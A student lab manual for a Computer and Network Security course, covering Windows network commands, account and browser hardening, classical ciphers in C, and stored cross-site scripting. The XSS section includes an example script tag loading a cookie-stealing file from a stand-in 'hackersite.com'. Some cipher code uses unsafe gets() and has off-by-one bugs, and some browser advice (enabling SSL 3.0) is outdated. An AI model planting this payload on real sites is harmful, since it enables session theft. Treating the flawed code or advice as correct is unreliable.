COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -1

List and practice various “net” Commands on DOS & Linux.

ipconfig – Quickly Find Your IP Address

You can find your IP address from the Control Panel, but this takes quite a few clicks. The ipconfig command is
a fast way of determining your computer’s IP address and other information, such as the address of its default
gateway — useful if you want to know the IP address of your router’s web interface.To use the command, just
type ipconfig into a Command Prompt window. You’ll see a list of all the network connections your computer is
using. Look under Wireless LAN adapter if you’re connected to Wi-Fi or Ethernet adapter Local Area
Connection if you’re connected to a wired network.

ipconfig /flushdns – Flush Your DNS Resolver Cache

If you change your DNS server, the effects won’t necessarily take place immediately. Windows uses a cache that
remembers DNS responses it’s received, saving time when you access the same addresses again in the future. To
ensure Windows is getting addresses from the new DNS servers instead of using old, cached entries, run
the ipconfig /flushdns command after changing your DNS server.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

ping, tracert – Troubleshoot Network Connection Issues

If you’re experiencing issues connecting to a website or other network connection issues, Windows and other
operating systems have some standard tools you can use to identify problems.First, there’s the ping command.
Type ping google.com and Windows will send packets to Google.com. Google will respond and let you know
it’s received them. You’ll be able to see if any packets didn’t make it to Google.com — perhaps you’re
experiencing packet loss — and how long it took you to hear back — perhaps the network is saturated and
packets are taking a while to reach their destinations.

There’s also the tracert command, which traces the route it takes for a packet to reach a destination. For example,
run tracert google.com and you’ll see the path your packet takes to reach Google. If you’re having issues
connecting to a website, tracert can show you where the problem is occurring.

shutdown – Create Shutdown Shortcuts on Windows 8

The shutdown command is particularly useful on Windows 8. You can use it to create your own shortcuts and
place them on your Start screen or desktop, allowing you to more easily shut down Windows without digging
through the charms bar or logging out first. This command can also be used to restart your computer. On
Windows 8, you can even use a special switch to restart your computer into the advanced startup options menu.

 Shut Down: shutdown /s /t 0

 Restart: shutdown /r /t 0

ENROLLMENT NO:___________________________ PAGE NO:______________

 COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
 Restart Into Startup Options: shutdown /r /o

recimg – Create Custom Recovery Images

The Refresh Your PC feature on Windows 8 allows you to restore your computer’s system state to its original
state — either from a clean Windows install or as the computer came from its manufacturer. You can create your
own custom recovery images, but this feature is hidden — you have to do it with the recimg command from a
command line. This allows you to remove manufacturer-installed bloatware or add your favorite desktop
programs to your recovery image.

wbadmin start backup – Create System Recovery Images

Windows 8.1 removes the Windows 7 backup interface, which allowed you to create system backup images.
These system images contain a complete snapshot of every single file on the system, so they’re different from
Windows 8’s recovery images. While the graphical interface has been removed, system administrators and geeks
can still create system image backups by running the wbadmin start backup cmdlet in a PowerShell window.
Unlike all the other commands here, this command-line tool must be run from within PowerShell, not the
Command Prompt.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

sfc /scannow – Scan System Files for Problems

Windows includes a system file checker tool that scans its system files and looks for problems. If system files are
missing or corrupted, the system file checker will repair them. This may fix problems with some Windows
systems. To use this tool, open a Command Prompt window as Administrator and run the sfc
/scannow command.

cipher – Permanently Delete and Overwrite a Directory

The cipher command is mostly used for managing encryption, but it also has an option that will write garbage
data to a drive, clearing its free space and ensuring no deleted file can be recovered. Deleted files normally stick
around on disk unless you’re using a solid state drive. The cipher command effectively allows you to “wipe” a
drive without installing any third-party tools. To use the command, specify the drive you want to wipe like so:
ciper /w:C:\

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

telnet – Connect to Telnet Servers

The telnet client isn’t installed by default. You’ll have to install it from the Control Panel. Once installed, you
can use the telnet command to connect to telnet servers without installing any third-party software. You should
avoid using telnet if you can help it, but if you’re connected directly to a device and it requires that you use telnet
to set something up — well, that’s what you have to do.

netstat -an – List Network Connections and Ports

The netstat command is particularly useful, displaying all sorts of network statistics when used with its various
options. One of the most interesting variants of netstat is netstat -an, which will display a list of all open
network connections on their computer, along with the port they’re using and the foreign IP address they’re
connected to.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -2

Configure a system for various security experiments.

To create a password for a user account, follow the below steps:

1. Click on Start > Control Panel

2. Under the User Accounts and Family Safety category, click on Add or remove user accounts

3. Choose the account that you would like to create a password for, this is done by clicking on the user
account name.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

4. The Change an Account page will open, click on Create a password

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

5. Type the password you want to set for this user account.

Remember to set a strong password, else it would be useless to have a password that anyone would
guess A strong password is considered to be :

o Is at least eight characters long. These characters contain letters, digits and special characters
such as ( $ , % , etc .. )
o Does not contain your user name, real name, or company name.
o Does not contain a complete word.
o Is significantly different from previous passwords.

Actually its really up to you, you can have a password of a single character and you might be satisfied
with it. After you type your password and confirm it again, click on Create password button. If you are
a person who usually forgets his passwords, then its better to type a password hint, so that when you
forget your password, from reading the hint, it will give you an idea what your password is, but
remember, password hint is visible to everyone who uses the computer, so make sure that your hint is
not understood by someone else, choose your own hints.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
6. After you click on the Create password button, the password will be created and the Change an
Account page will open again, you will notice now that the Create a password option is now replace
with Change the password and Remove the password

Your user account is now protected with a password, so you can safely lock your user account or even
log off, and you will be confident now that no one will be able to log on to your user account, unless of
course you provided him/her with your own password.

Restrict other user account:

A new installation is the easiest to get right because there's no prior setup to work around. This illustration uses
two Windows accounts:

 SteveAdmin: The first account created during installation; it should be used solely for administrative
tasks.
 Steve: The second account created as a standard user; this limited account is used for day-to-day work.
The built-in Administrator account will not be used in any way, and it will remain disabled. Follow these steps
to set up Windows 7:

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
Install Windows 7, creating an initial user named "SteveAdmin" This should be the usual “install-from-DVD”
process. The initial parts take some time (and at least one reboot) before asking any questions related to setting
up users. When prompted, name the first user SteveAdmin. It's automatically created as an Administrative
account. If you choose to give the account a password, be sure to remember it—it will be required for all
administrative duties on your computer.

Complete the Windows 7 installation

This includes configuring Automatic Updates, addition of required drivers, configuring the network, and the like.
This is all done as the Administrative user SteveAdmin.

Create a new account named "Steve" as a standard user While logged in as SteveAdmin, navigate to the Control
Panel:

 Click the Start icon.

 Click Control Panel.
 Click Add or remove user accounts under User Accounts and Family Safety.
 Click Create a new account under the list of current accounts.
 Populate the dialog box with the new user name—Steve—and then click Standard User.
 Click Create Account to make it so.

Assign a password to the new user "Steve" (if desired) When the account has been created, a list of current users
appears with the caption, "Choose the account you would like to change." Click the icon for the newly
created Steve account, which should be listed as a Standard User. Click Create a password, and enter a
password (twice!), along with a password hint if you like.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -3

Configure Web browser security settings.

Google Chrome
These settings can be accessed through Chrome’s “Advanced Settings” menu or by navigating to
“chrome://settings/."

 Enable phishing and malware protection: Make sure that Chrome’s phishing and malware protection
feature is enabled under the “Privacy” section. This feature will warn you if a site you’re trying to visit may
be phishing or contain malware.
 Turn off instant search: The Instant search feature should be turned off for optimal security. While it
offers some convenience in searching, having this feature enabled means that anything you type in the
address bar is instantly sent to Google.
 Don’t sync: Disconnect your email account from your browser under the “Personal Stuff” tab. Syncing your
email account with your Chrome browser means that personal information such as passwords, autofill data,
preferences, and more is stored on Google’s servers. If you must use sync, select the “Encrypt all synced
data” option and create a unique passphrase for encryption.
 Configure content settings: Click “Content settings” under the “Privacy” section and do the following:
 Cookies: Select “Keep local data only until I quit my browser” and “Block third-party cookies and site
data.” These options ensure that your cookies will be deleted upon quitting Chrome and that advertisers
will not be able to track you using third-party cookies.
 JavaScript: Select “Do not allow any site to run JavaScript.” It is widely recommended that JavaScript
be disabled whenever possible to protect users from its security vulnerabilities.
 Pop-ups: Select “Do not allow any site to show pop-ups.
 Location: Select “Do not allow any site to track my physical location.”
 Configure passwords and forms settings: Disable Autofill and deselect “Offer to save passwords I enter
on the web” under the “Passwords and forms” section. Doing so will prevent Chrome from saving your
logins, passwords, and other sensitive information that you enter into forms.

Internet Explorer
These settings can be accessed through the “Internet Options” menu.
 Configure security settings: Under the “Security” tab, do the following:
 Set security zones: IE offers the option to configure different security settings for different “zones,”
including the Internet, local intranet, trusted sites, and restricted sites. Set up the zones for Intranet,
Trusted Sites, and Restricted sites to your desired security level.
 Set Internet zone security to “Medium High” or higher. This blocks certain cookie types, enables
ActiveX filtering, and implements several other default settings for increased security.
 Disable javaScript: Click “Custom Level,” locate the “Active Scripting” setting, and select “Disable.”
It is recommended that users disable JavaScript because of the high amount of vulnerabilities it
contains.
 Automatically clear history: Select “Delete browsing history on exit” under the “General” tab. Clearing
your history at the end of each session helps to limit the amount of information IE saves when you browse.
 Configure privacy settings: Under the “Privacy” tab, complete the following steps:
 Privacy setting: Set the Internet zone privacy to “Medium High” or higher. This blocks certain cookie
types to prevent sites from tracking or contacting you without your consent.
 Location: Select “Never allow websites to request your physical location.”
 Pop-up Blocker: Double check that Pop-up Blocker is enabled.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
 Configure Advanced Security settings: Scroll down to the “Security” section under the “Advanced” tab
and do the following:
 Ensure that all default settings are in place. If you aren’t sure, click “Restore advanced settings” before
making any other changes.
 Select “Do not save encrypted pages to disk.” This will delete files cached from HTTPS pages when the
browser is closed.
 Select “Empty Temporary Internet Files folder when browser is closed.” This prevents IE from storing
your personal info (logins, passwords, activity, etc) beyond your browsing session.
 Turn off autoComplete: The AutoComplete feature should be turned off for forms and
usernames/passwords. Keeping AutoComplete turned off ensures that your sensitive information isn’t
being stored unnecessarily.
 Tracking protection: IE’s Tracking Protection feature keeps your browsing private from specified third-
party websites. This feature can be accessed through IE’s “Safety” menu. In order to use Tracking
Protection you will need to provide a Tracking Protection List that names all of the sites you don’t want
your information being sent to. You can create a list yourself or download lists online.

Mozilla Firefox
These settings can be accessed through the “Options” menu.
 Configure privacy settings: Under the “Privacy” tab, complete the following steps. These measures ensure
that Firefox is storing only as much of your information as it needs to function normally.
 Select “Use custom settings for history.”
 Deselect “Remember my browsing and download history.”
 Deselect “Remember search and form history.”
 Deselect “Accept third-party cookies.”
 Set cookie storage to “Keep until I close Firefox.”
 Select “Clear history when Firefox closes.”
 Configure security settings: Under the “Security” tab, choose the following settings. These steps prevent
Firefox from saving your passwords and keep you from visiting potentially harmful sites.
 Verify that “Warn me when sites try to install add-ons,” “Block reported attack sites,” and “Block
reported web forgeries” are all selected.
 Deselect “Remember passwords for sites.”
 Disable javaScript: Deselect “Enable JavaScript” under the “Content” tab. JavaScript is notorious for
containing security vulnerabilities and it is recommended that users only enable it for trusted sites.
 Enable pop-up blocking: Verify that “Block pop-up windows” is selected under the “Content” tab. This
feature should be turned on by default as it protects users from unwarranted advertisements and windows.
 Don’t sync: Avoid using Firefox Sync. By doing so you prevent Firefox from storing your logins,
passwords, and other sensitive information.
 Turn on automatic updates: Verify that “Automatically install updates” is selected in the “Update” tab
under “Advanced.” Doing so will ensure that your browser receives critical security updates. Verify that
“Automatically update Search Engines” is selected as well.
 Use secure protocols: Verify that “Use SSL 3.0” and “Use TLS 1.0” are selected in the “Encryption” tab
under “Advanced.”

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -4
Draw Diagram of DoS, backdoors, trapdoors.

DOS:

BACKDOORS:

TRAPDOORS:

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -5

Draw diagrams of sniffing, spoofing, man in the middle & replay attacks.
Sniffing:

Spoofing:

MITM:

Replay:

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -6

Draw diagram for Confidentiality, Integrity & Availability.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -7

Write Ceaser’s Cipher algorithm & Solve various examples based on Encryption & Decryption.

The transformation can be represented by aligning two alphabets; the cipher alphabet is the plain alphabet rotated
left or right by some number of positions. For instance, here is a Caesar cipher using a left rotation of three
places, equivalent to a right shift of 23 (the shift parameter is used as the key):

Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: XYZABCDEFGHIJKLMNOPQRSTUVW

When encrypting, a person looks up each letter of the message in the "plain" line and writes down the
corresponding letter in the "cipher" line.

Plaintext: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD

Deciphering is done in reverse, with a right shift of 3.

The encryption can also be represented using modular arithmetic by first transforming the letters into numbers,
according to the scheme, A → 0, B → 1, ..., Z → 25. Encryption of a letter x by a shift n can be described
mathematically as,
C=(P+3) MOD 26
Decryption is performed similarly,
P=(C-3) MOD 26
(There are different definitions for the modulo operation. In the above, the result is in the range 0 to 25; i.e.,
if x + n or x − n are not in the range 0 to 25, we have to subtract or add 26.) where C= cipher text and P= plain
text

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -8

Write, test and debug Ceaser cipher algorithm in C/C++/Java/Python/Matlab.

Encryption

#include<stdio.h>
int main()
{
char message[100], ch;
int i, key;

printf("Enter a message to encrypt: ");

gets(message);
printf("Enter key: ");
scanf("%d", &key);

for(i = 0; message[i] != '\0'; ++i){

ch = message[i];

if(ch >= 'a' && ch <= 'z'){

ch = ch + key;

if(ch > 'z'){

ch = ch - 'z' + 'a' - 1;
}

message[i] = ch;
}
else if(ch >= 'A' && ch <= 'Z'){
ch = ch + key;

if(ch > 'Z'){

ch = ch - 'Z' + 'A' - 1;
}

message[i] = ch;
}
}

printf("Encrypted message: %s", message);

return 0;
}

Output

Enter a message to encrypt: axzd

Enter key: 4
Encrypted message: ebdh

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Decryption

#include<stdio.h>

int main()
{
char message[100], ch;
int i, key;

printf("Enter a message to decrypt: ");

gets(message);
printf("Enter key: ");
scanf("%d", &key);

for(i = 0; message[i] != '\0'; ++i){

ch = message[i];

if(ch >= 'a' && ch <= 'z'){

ch = ch - key;

if(ch < 'a'){

ch = ch + 'z' - 'a' + 1;
}

message[i] = ch;
}
else if(ch >= 'A' && ch <= 'Z'){
ch = ch - key;

if(ch < 'A'){

ch = ch + 'Z' - 'A' + 1;
}

message[i] = ch;
}
}

printf("Decrypted message: %s", message);

return 0;
}

Output

Enter a message to decrypt: ebdh

Enter key: 4
Decrypted message: axzd

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -9

Write algorithm/steps for Shift Cipher & solve various examples on it.

Encryption

#include<stdio.h>
int main()
{
char message[100], ch;
int i, key;

printf("Enter a message to encrypt: ");

gets(message);
printf("Enter key: ");
scanf("%d", &key);

for(i = 0; message[i] != '\0'; ++i){

ch = message[i];

if(ch >= 'a' && ch <= 'z'){

ch = ch + key;

if(ch > 'z'){

ch = ch - 'z' + 'a' - 1;
}

message[i] = ch;
}
else if(ch >= 'A' && ch <= 'Z'){
ch = ch + key;

if(ch > 'Z'){

ch = ch - 'Z' + 'A' - 1;
}

message[i] = ch;
}
}

printf("Encrypted message: %s", message);

return 0;
}

Output

Enter a message to encrypt: axzd

Enter key: 4
Encrypted message: ebdh

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Decryption

#include<stdio.h>

int main()
{
char message[100], ch;
int i, key;

printf("Enter a message to decrypt: ");

gets(message);
printf("Enter key: ");
scanf("%d", &key);

for(i = 0; message[i] != '\0'; ++i){

ch = message[i];

if(ch >= 'a' && ch <= 'z'){

ch = ch - key;

if(ch < 'a'){

ch = ch + 'z' - 'a' + 1;
}

message[i] = ch;
}
else if(ch >= 'A' && ch <= 'Z'){
ch = ch - key;

if(ch < 'A'){

ch = ch + 'Z' - 'A' + 1;
}

message[i] = ch;
}
}

printf("Decrypted message: %s", message);

return 0;
}

Output

Enter a message to decrypt: ebdh

Enter key: 4
Decrypted message: axzd

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -10

Write algorithm/steps for Hill Cipher and solve examples on it.

#include<stdio.h>
#include<conio.h>
#include<string.h>
void main()
{
int k[3][3];
char pt[50],ct[50];
int i,j,part,temp=0,n=0;
clrscr();
printf("=============Hill Cipher=============\n");
printf("Enter the key\n");
for(i=0;i<3;i++)
{
for(j=0;j<3;j++)
{
printf("k[%d][%d]:-",i,j);
scanf("%d",&k[i][j]);
}
}
printf("Enter the plain text:-");
scanf("%s",&pt);
strlwr(pt);
switch(strlen(pt)%3)
{
case 1:
strcat(pt,"xy");
break;
case 2:
strcat(pt,"x");
break;
}
for(part=0;part<strlen(pt)/3;part++)
{
for(i=0;i<3;i++)
{
for(j=0;j<3;j++)
{
temp+=k[i][j]*(pt[part*3+j]-97);
}
ct[n++]=temp%26+97;
temp=0;
}

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

}
ct[n]='\0';
printf("Cipher Text:-%s",ct);
getch();
}

Output:-

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -11

Write algorithm/steps for playfair cipher and solve examples on it.

#include<stdio.h>
#include<conio.h>
#include<string.h>
#include<math.h>

int mat[5][5];
char pt[100]={"\0"},cpt[100];
void main()
{
int i,tmp=0,len,tmp1=0,l,m,i1,i2,j1,j2;
char ptn[100];
void matgen();
clrscr();
printf("---------play fair---------\n---------------------------");
printf("\nenter plain text");
flushall();
gets(pt);
for(i=0;pt[i]!='\0';i++)
{
if(pt[i]=='j')
pt[i]='i';
}
for(i=0;pt[i]!='\0'||pt[i+1]!='\0';i++)
{
if(pt[i]!=pt[i+1])
{
ptn[tmp]=pt[i];
ptn[tmp+1]=pt[i+1];
i++;
}
else
{
ptn[tmp]=pt[i];
ptn[tmp+1]='x';
}
tmp=tmp+2;
}
strcpy(pt,ptn);
len=(strlen(pt));
if((len%2)!=0)
{
ENROLLMENT NO:___________________________ PAGE NO:______________
COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
pt[len]='x';
pt[len+1]='\0';
}
tmp=0;
len=strlen(pt);
printf("After Modification of Plain Text The New Plain Text is ::-\n------------------------\n");
puts(pt);
printf("-----------------------------\n");
matgen();
for(i=0;i<len;i++)
{
for(l=0;l<5;l++)
{
for(m=0;m<5;m++)
{
if(pt[i]==mat[l][m])
{
i1=l;
j1=m;
}
if(pt[i+1]==mat[l][m])
{
i2=l;
j2=m;
}
}
}
if(i1==i2)
{
if(j1==4)
j1=-1;
if(j2==4)
j2=-1;

cpt[tmp1]=mat[i1][j1+1];
cpt[tmp1+1]=mat[i2][j2+1];
}
else if(j1==j2)
{
if(i1==4)
i1=-1;
else if(i2==4)
i2=-1;

cpt[tmp1]=mat[i1+1][j1];
cpt[tmp1+1]=mat[i2+1][j2];
}

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
else
{
cpt[tmp1]=mat[i1][j2];
cpt[tmp1+1]=mat[i2][j1];
}
tmp1=tmp1+2;
i++;
}
cpt[len]='\0';
printf("\nAfter Modification of Plain Text The New cipher Text is ::-\n-----------------------\n");
puts(cpt);
getch();
}
void matgen()
{
int i,l1,j,tmp=0,l,m,f=0,l2,fl=0;
int lk=0;
char k[25],abs[26];
abs[0]='a';
for(i=1;i<=8;i++)
{
abs[i]=abs[0]+i;
}
for(i=10;i<=25;i++)
{
abs[i-1]=abs[0]+i;
}
abs[25]='\0';
printf("enter the key");
gets(k);
for(i=0;k[i]!='\0';i++)
{
if(k[i]=='j')
k[i]='i';
}
k[strlen(k)+1]='\0';
for(i=0;i<5;i++)
{
for(j=0;j<5;j++)
{
mat[i][j]= -1;
}
}
for(i=0;i<5;i++)
{
for(j=0;j<5;j++)
{

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
f=0;
for(l=0;l<=i;l++)
{
for(m=0;m<=5;m++)
{
if(k[tmp]==mat[l][m])
{
f=1;
if(j!=0)
j--;
else
{
i=i-1;
j=4;
}

}
}
}
if(f==0)
{
mat[i][j]=k[tmp];
lk++;
}
if(k[tmp+1]=='\0')
{
fl=1;
break;
}
tmp++;
if(fl==1)
break;
}
if(fl==1)
break;
}

l1=((lk/5));
tmp=0;
l2=((lk%5));
j=l2;
printf("The Matrix for the given KEY is ::-\n--------------------------\n");
if(l2!=0)
{
while(j<5)
{
f=0;

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
for(l=0;l<=l1;l++)
{
for(m=0;m<=5;m++)
{
if(abs[tmp]==mat[l][m])
{
f=1;
break;
}
}
}
if(f==0)
{
mat[l1][j]=abs[tmp];
j++;
if(abs[tmp+1]=='\0')
break;
}
if(abs[tmp+1]=='\0')
break;
tmp++;
}
}
//
l1=((lk/5)+1);
//
if((lk%5)==0)
{
l1--;
}
//
for(i=l1;i<5;i++)
{ j=0;
while(j<5)
{
f=0;
for(l=0;l<=i;l++)
{
for(m=0;m<=5;m++)
{
if(abs[tmp]==mat[l][m])
{
f=1;
}
}
}
if(f==0)

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
{
mat[i][j]=abs[tmp];
j++;
if(abs[tmp+1]=='\0')
break;
}
tmp++;
}
}
for(l=0;l<5;l++)
{
for(m=0;m<5;m++)
{
printf(" %c ",mat[l][m]);
}
printf("\n");
}
printf("--------------------------");
}

Output :-

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -12

Write algorithm/steps for Verman Cipher & solve various examples on it.

#include<stdio.h>
#include<conio.h>
#include<String.h>

char s[30],key[30];
void main()
{
int i,c1,c2,c5;
char c[26],k[30];
clrscr();
for(i=97;i<122;i++)
{
c[i-97]=i;
}

printf("Enter Plain Text:---");

gets(s);

printf("Enter Key:---");
gets(key);

for(i=0;i<strlen(s);i++)
{
c1=s[i]-97;
c2=key[i]-97;
c5=c1+c2;

if(c5>26)
{
c5=c5-26;
c5=c5+97;
printf("%c",c5);
}

else
{
c5=c5+97;
printf("%c",c5);
}
}
getch();
}
ENROLLMENT NO:___________________________ PAGE NO:______________
COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Output:-

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -13

Write algorithm/steps for Vignere Cipher & solve various examples on it.

The Vigenère cipher uses a 26×26 table with A to Z as the row heading and column heading This table is usually
referred to as the Vigenère Tableau, Vigenère Table or Vigenère Square. We shall use Vigenère Table. The
first row of this table has the 26 English letters. Starting with the second row, each row has the letters shifted to
the left one position in a cyclic way. For example, when B is shifted to the first position on the second row, the
letter A moves to the end.

In addition to the plaintext, the Vigenère cipher also requires a keyword, which is repeated so that the total
length is equal to that of the plaintext. For example, suppose the plaintext isMICHIGAN TECHNOLOGICAL
UNIVERSITY and the keyword is HOUGHTON. Then, the keyword must be repeated as follows:

MICHIGAN TECHNOLOGICAL UNIVERSITY

HOUGHTON HOUGHTONHOUGH TONHOUGNTO

We follow the tradition by removing all spaces and punctuation, converting all letters to upper case, and dividing
the result into 5-letter blocks. As a result, the above plaintext and keyword become the following:

MICHI GANTE CHNOL OGICA LUNIV ERSIT Y

HOUGH TONHO UGHTO NHOUG HTONH OUGHT O

To encrypt, pick a letter in the plaintext and its corresponding letter in the keyword, use the keyword letter and
the plaintext letter as the row index and column index, respectively, and the entry at the row-column intersection
is the letter in the ciphertext. For example, the first letter in the plaintext is M and its corresponding keyword
letter is H. This means that the row of H and the column of M are used, and the entry T at the intersection is the
encrypted result.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Similarly, since the letter N in MICHIGAN corresponds to the letter N in the keyword, the entry at the
intersection of row N and column N is A which is the encrypted letter in the ciphertext

Repeating this process until all plaintext letters are processed, the ciphertext is TWWNPZOA
ASWNUHZBNWWGS NBVCSLYPMM. The following has the plaintext, repeated keyword and ciphertext
aligned together.

MICHI GANTE CHNOL OGICA LUNIV ERSIT Y

HOUGH TONHO UGHTO NHOUG HTONH OUGHT O
TWWNP ZOAAS WNUHZ BNWWG SNBVC SLYPM M

To decrypt, pick a letter in the ciphertext and its corresponding letter in the keyword, use the keyword letter to
find the corresponding row, and the letter heading of the column that contains the ciphertext letter is the needed
plaintext letter. For example, to decrypt the first letter T in the ciphertext, we find the corresponding letter H in
the keyword. Then, the row of H is used to find the corresponding letter T and the column that
contains T provides the plaintext letter M (see the above figures). Consider the fifth letter P in the ciphertext.
This letter corresponds to the keyword letter H and row H is used to find P. Since P is on column I, the
corresponding plaintext letter is I.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -14

Write algorithm/steps for one time pad & solve various examples on in.

#include<stdio.h>
#include<conio.h>
#include<String.h>

char s[30],key[30];
void main()
{
int i,c1,c2,c5;
char c[26],k[30];
clrscr();

for(i=97;i<122;i++)
{
c[i-97]=i;
}
printf("Enter Plain Text:---");
gets(s);

printf("Enter Key:---");
gets(key);

for(i=0;i<strlen(s);i++)
{
c1=s[i]-97;
c2=key[i]-97;
c5=c1+c2;

if(c5>26)
{
c5=c5-26;
c5=c5+97;
printf("%c",c5);
}

else
{
c5=c5+97;
printf("%c",c5);
}
}
getch();
}
ENROLLMENT NO:___________________________ PAGE NO:______________
COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Output:-

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -15

Draw diagram of Public Key Infrastructure.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -16

Draw diagram of Centralized/Decentralized Infrastructure.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -17
Demonstrate cross-scripting.

Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web
application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target
the application itself. Instead, the users of the web application are the ones at risk. A successful cross site
scripting attack can have devastating consequences for an online business's reputation and its relationship with
its clients. Depending on the severity of the attack, user accounts may be compromised, Trojan horse programs
activated and page content modified, misleading users into willingly surrendering their private data. Finally,
session cookies could be revealed, enabling a perpetrator to impersonate valid users and abuse their private
accounts. Cross site scripting attacks can be broken down into two types: stored and reflected.

Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is
injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script
off of a web application, onto a user's browser. The script is embedded into a link, and is only activated once that
link is clicked on.

WHAT IS STORED CROSS SITE SCRIPTING

To successfully execute a stored XSS attack, a perpetrator has to locate a vulnerability in a web application and
then inject malicious script into its server (e.g., via a comment field).

One of the most frequent targets are websites that allow users to share content, including blogs, social networks,
video sharing platforms and message boards. Every time the infected page is viewed, the malicious script is
transmitted to the victim's browser.

STORED XSS ATTACK EXAMPLE

While browsing an e-commerce website, a perpetrator discovers a vulnerability that allows HTML tags to be
embedded in the site's comments section. The embedded tags become a permanent feature of the page, causing
the browser to parse them with the rest of the source code every time the page is opened.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

The attacker adds the following comment: Great price for a great item! Read my review here <script
src="http://hackersite.com/authstealer.js"> </script>. From this point on, every time the page is accessed,
the HTML tag in the comment will activate a JavaScript file, which is hosted on another site, and has the ability
to steal visitors' session cookies.

Using the session cookie, the attacker can compromise the visitor’s account, granting him easy access to his
personal information and credit card data. Meanwhile, the visitor, who may never have even scrolled down to the
comments section, is not aware that the attack took place.

Unlike a reflected attack, where the script is activated after a link is clicked, a stored attack only requires that the
victim visit the compromised web page. This increases the reach of the attack, endangering all visitors no matter
their level of vigilance.

From the perpetrator's standpoint, persistent XSS attacks are relatively harder to execute because of the
difficulties in locating both a trafficked website and one with vulnerabilities that enables permanent script
embedding.

STORED XSS ATTACK PREVENTION/MITIGATION

A web application firewall (WAF) is the most commonly used solution for protection from XSS and web
application attacks.

WAFs employ different methods to counter attack vectors. In the case of XSS, most will rely on signature based
filtering to identify and block malicious requests.

In accordance with industry best-practices, Imperva Incapsula's web application firewall also employs signature
filtering to counter cross site scripting attacks.

Incapsula WAF is offered as a managed service, regularly maintained by a team of security experts who are
constantly updating the security rule set with signatures of newly discovered attack vectors.
Incapsula crowdsourcing technology automatically collects and aggregates attack data from across its network,
for the benefit of all customers.

The crowdsourcing approach enables extremely rapid response to zero-day threats, protecting the entire user
community against any new threat, as soon as a single attack attempt is identified.

